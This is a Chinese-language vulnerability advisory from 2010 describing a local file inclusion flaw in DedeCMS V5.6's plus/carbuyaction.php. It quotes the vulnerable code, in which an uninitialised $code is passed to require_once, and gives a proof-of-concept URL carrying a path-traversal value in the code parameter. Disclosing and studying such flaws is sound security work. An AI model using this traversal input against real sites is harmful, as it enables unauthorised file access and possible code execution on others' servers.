织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
- 发表于
- Vulndb
发布时间:2010-06-20
影响版本:
DedeCmsV5.6
漏洞描述:
DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
<?php require_once (dirname(__FILE__) . "/../include/common.inc.php"); define('_PLUS_TPL_', DEDEROOT.'/templets/plus'); require_once DEDEINC.'/dedetemplate.class.php'; require_once DEDEINC.'/shopcar.class.php'; require_once DEDEINC.'/memberlogin.class.php'; if($cfg_mb_open=='N') { ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;"); exit(); } $cfg_ml = new MemberLogin(); if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行,By:俺是农村的。 ... }elseif($dopost == 'return'){ require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化,By:俺是农村的。 $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,"javascript:;",0,3000); exit(); } ?> |
测试方法:
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
1 |
http://www.ssvdb.com/plus/carbuyaction.php?dopost=return&code=../../ |
安全建议:
厂商补丁:
DedeCMS
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/
原文连接:织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
![织梦DEDECMS search.php注入漏洞EXP[通杀]](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2013/01/11.jpg&h=144&w=208&zc=1)
